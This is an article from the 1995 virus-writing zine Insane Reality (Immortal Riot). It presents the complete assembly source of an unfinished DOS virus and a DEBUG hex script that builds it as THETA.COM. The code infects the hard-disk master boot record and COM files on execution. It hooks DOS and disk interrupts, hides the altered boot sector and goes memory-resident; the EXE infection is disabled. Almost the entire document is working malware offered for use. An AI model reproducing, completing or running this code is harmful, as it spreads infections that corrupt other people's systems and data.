Insane Reality issue #7 - (c)opyright 1995 Immortal Riot File 011 % Infection Incomplete % ------------------------ You might ask me why I release this incomplet virus? Well, it's because of my laziness.. I had an reality.011 reserved for Conzouler's contribution :).. end of story.. It's thought to be an mbr/com/exe full-stealth virus with a lot of nifty things, but the exe-infector _might_ bug and is now commented out by jmp-directives (but still included in the code :)). Well, since Conzouler didn't manage to add full-stealth within 20 minutes, fix the exe-infection-bug and prioritated parties rather than coding (you animal!), this is all you get this time :-). It still infects the mbr and com-files.. The infection-routine is very much the same for com and exe-files, so when it works completely, it should be something to check out (as for all Conzouler's work that is 95% ready, hehe. well.. just wait long enough, and I'm sure you'll see what he's capable too.. ) - The Unforgiven. .model tiny .code .286 org 100h bufsize equ 64 codesize equ offset last - offset entry parasize equ (codesize+bufsize) / 16 + 1 secsize equ codesize / 512 + 1 allocsize equ (codesize+bufsize) / 1024 + 1 infectsize equ codesize + 19h exepagesize equ (infectsize / 512) + 1 exelastpage equ infectsize - (512*(infectsize/512)) true equ 0F9h ; set carry false equ 0F8h ; clear carry entry: fileexec: ; Executed from file: infect MBR if not resident and restore carrier. ; Get delta offset call getdelta getdelta: pop si sub si, offset getdelta - offset entry ; Installation check mov ax, 3077h int 21h cld push ds jcxz infectmbr restorecarrier: pop ds push ds pop es ; Check filetype cmp byte ptr cs:si[codesize], 'M' jne restorecom ; Restore exefile push ds pop ax add ax, 10h add ax, word ptr cs:si[codesize+16h] push ax mov ax, word ptr cs:si[codesize+14h] push ax retf ; Jump to carrier restorecom: ; Restore comfile mov di, 100h ; Entry point for com push di add si, codesize movsw movsb ret ; jump to carrier infectmbr: ; Infect harddisk master boot record. ; Load original mbr push cs pop es push cs pop ds lea bx, si[last+19h] mov ax, 0201h inc cx mov dx, 0080h int 13h jc restorecarrier ; Infection check (see if mbr starts with 'push cs') cmp byte ptr es:[bx], 0Eh je restorecarrier ; Write original mbr to sector 2 mov ax, 0301h push ax inc cx int 13h pop ax jc restorecarrier ; Write loader to mbr push si mov di, bx add si, offset loader - offset entry mov cl, offset last - offset loader rep movsb pop si inc cx int 13h jc restorecarrier ; Write vircode to sector 3 mov ax, 300h + secsize mov bx, si push cs pop es mov cl, 3 int 13h ; Restore carrier file jmp restorecarrier ; ; Interrupt 21 handler. ; ; Responds to installation checks. ; vec21: ; Check for installation check cmp ax, 3077h jne vec21cle mov cx, ax iret vec21cle: ; Check for load and execute call cmp ax, 4B00h jne vec21x jmp loadexec vec21x: db 0EAh i21o dw 0 i21s dw 0 loadexec: push ax push bx ; Open file in read/write mode mov ax, 3D82h int 21h xchg ax, bx jc loadexecend call infectfile mov ah, 3Eh int 21h loadexecend: pop bx pop ax jmp vec21x infectfile proc ; Infects a file whose handle is in BX push ax push bx push cx push dx push si push di push ds push cs pop ds ; Read beginning of file mov ax, 4200h xor cx, cx xor dx, dx int 21h mov ah, 3Fh mov cx, 18h mov dx, offset last int 21h ; This line disables .exe-infection (since it doesn't work any good) cmp byte ptr last, 'M' jne itsacom jmp infectfileend itsacom: ; Seek to last byte of file mov ax, 4202h xor cx, cx xor dx, dx int 21h mov si, ax mov di, dx dec ax mov cx, dx mov dx, ax mov ax, 4200h int 21h ; Read last byte of file mov ah, 3Fh mov cx, 1 mov dx, offset lastbyteoffile int 21h jc infectfileend ; Check if already infected mov byte ptr [last+18h], 3Fh db 80h,3Eh ; cmp byte ptr [last+18h], dw offset [last+18h] lastbyteoffile db ? je infectfileend ; Append virus mov ah, 40h mov cx, infectsize mov dx, offset entry int 21h jc infectfileend ; Seek to beginning mov ax, 4200h xor cx, cx mov dx, cx int 21h cmp byte ptr [last], 'M' je buildexehead ; Change .com-file entry mov byte ptr [last], 0E9h sub si, 3 mov word ptr last[1], si jmp overwriteheader buildexehead: ; Calculate new entry mov ax, si ; LSW of entry mov dx, di ; MSW of entry mov cx, 10h div cx ; paragraph to entry sub ax, word ptr [last+8] ; subtract headersize mov word ptr [last+14h], dx ; ip to entry mov word ptr [last+16h], ax ; cs to entry ; Calculate new file size mov ax, si mov dx, di add ax, infectsize adc dx, 0 mov cx, 200h div cx inc ax mov word ptr [last+2], dx mov word ptr [last+4], ax overwriteheader: ; Write new header to file mov ah, 40h mov cx, 18h mov dx, offset last int 21h infectfileend: pop ds pop di pop si pop dx pop cx pop bx pop ax ret infectfile endp ; ; Interrupt 13h handler. ; ; Stealths reads and writes on hard disk MBR. ; During the boot process it hooks interrupt 21 when dos ; loads an .exe-file. ; vec13: ; Check if mbr load request cmp ah, 02h jne vec13x cmp cx, 1 jne vec13dl cmp dx, 80h jne vec13dl ; Redirect to original mbr inc cl int 13h dec cl retf 2 vec13x: db 0EAh i13o dw 0 i13s dw 0 vec13dl: ; Check if dos is loaded predos db true jnc vec13x pushf push cs call vec13x pushf cmp word ptr es:[bx], 'ZM' jne vec13dlx ; Install dos handler push ax push ds mov cs:predos, false xor ax, ax mov ds, ax mov ax, ds:[84h] mov cs:[i21o], ax mov ax, ds:[86h] mov cs:[i21s], ax mov word ptr ds:[84h], offset vec21 mov ds:[86h], cs pop ds pop ax vec13dlx: popf retf 2 ; ; Code to be inserted into bootsector ; loader: ; Allocate memory push cs pop ds sub word ptr ds:[413h], allocsize ; Decrease system memory int 12h mov cx, 40h ; Convert to paras mul cx sub ax, 10h mov es, ax ; Read vircode to allocated memory mov ax, 200h + secsize mov bx, 100h mov cl, 3 mov dx, 80h int 13h ; Chain interrupt 13 mov ax, ds:[4*13h] mov es:[offset i13o], ax mov ax, ds:[4*13h+2] mov es:[offset i13s], ax mov ax, offset vec13 mov ds:[4*13h], ax mov ds:[4*13h+2], es ; Set up code to wait for dos to load mov es:predos, true ; Reboot again int 19h last: ; Entry of original .com-file int 20h nop end entry ================================================================== ============== N THETA.COM E 0100 E8 00 00 5E 83 EE 03 B8 77 30 CD 21 FC 1E E3 28 E 0110 1F 1E 07 2E 80 BC F6 01 4D 75 12 1E 58 05 10 00 E 0120 2E 03 84 0C 02 50 2E 8B 84 0A 02 50 CB BF 00 01 E 0130 57 81 C6 F6 01 A5 A4 C3 0E 07 0E 1F 8D 9C 0F 03 E 0140 B8 01 02 41 BA 80 00 CD 13 72 C5 26 80 3F 0E 74 E 0150 BF B8 01 03 50 41 CD 13 58 72 B5 56 8B FB 81 C6 E 0160 B6 01 B1 40 F3 A4 5E 41 CD 13 72 A4 B8 01 03 8B E 0170 DE 0E 07 B1 03 CD 13 EB 97 3D 77 30 75 03 8B C8 E 0180 CF 3D 00 4B 75 02 EB 05 EA 00 00 00 00 50 53 B8 E 0190 82 3D CD 21 93 72 07 E8 08 00 B4 3E CD 21 5B 58 E 01A0 EB E6 50 53 51 52 56 57 1E 0E 1F B8 00 42 33 C9 E 01B0 33 D2 CD 21 B4 3F B9 18 00 BA F6 02 CD 21 80 3E E 01C0 F6 02 4D 75 03 E9 8E 00 B8 02 42 33 C9 33 D2 CD E 01D0 21 8B F0 8B FA 48 8B CA 8B D0 B8 00 42 CD 21 B4 E 01E0 3F B9 01 00 BA F4 01 CD 21 72 6B C6 06 0E 03 3F E 01F0 80 3E 0E 03 00 74 5F B4 40 B9 0F 02 BA 00 01 CD E 0200 21 72 53 B8 00 42 33 C9 8B D1 CD 21 80 3E F6 02 E 0210 4D 74 0E C6 06 F6 02 E9 83 EE 03 89 36 F7 02 EB E 0220 2B 8B C6 8B D7 B9 10 00 F7 F1 2B 06 FE 02 89 16 E 0230 0A 03 A3 0C 03 8B C6 8B D7 05 0F 02 83 D2 00 B9 E 0240 00 02 F7 F1 40 89 16 F8 02 A3 FA 02 B4 40 B9 18 E 0250 00 BA F6 02 CD 21 1F 5F 5E 5A 59 5B 58 C3 80 FC E 0260 02 75 14 83 F9 01 75 14 81 FA 80 00 75 0E FE C1 E 0270 CD 13 FE C9 CA 02 00 EA 00 00 00 00 F9 73 F8 9C E 0280 0E E8 F3 FF 9C 26 81 3F 4D 5A 75 26 50 1E 2E C6 E 0290 06 7C 02 F8 33 C0 8E D8 A1 84 00 2E A3 89 01 A1 E 02A0 86 00 2E A3 8B 01 C7 06 84 00 79 01 8C 0E 86 00 E 02B0 1F 58 9D CA 02 00 0E 1F 83 2E 13 04 01 CD 12 B9 E 02C0 40 00 F7 E1 2D 10 00 8E C0 B8 01 02 BB 00 01 B1 E 02D0 03 BA 80 00 CD 13 A1 4C 00 26 A3 78 02 A1 4E 00 E 02E0 26 A3 7A 02 B8 5E 02 A3 4C 00 8C 06 4E 00 26 C6 E 02F0 06 7C 02 F9 CD 19 CD 20 90 RCX 01F9 W Q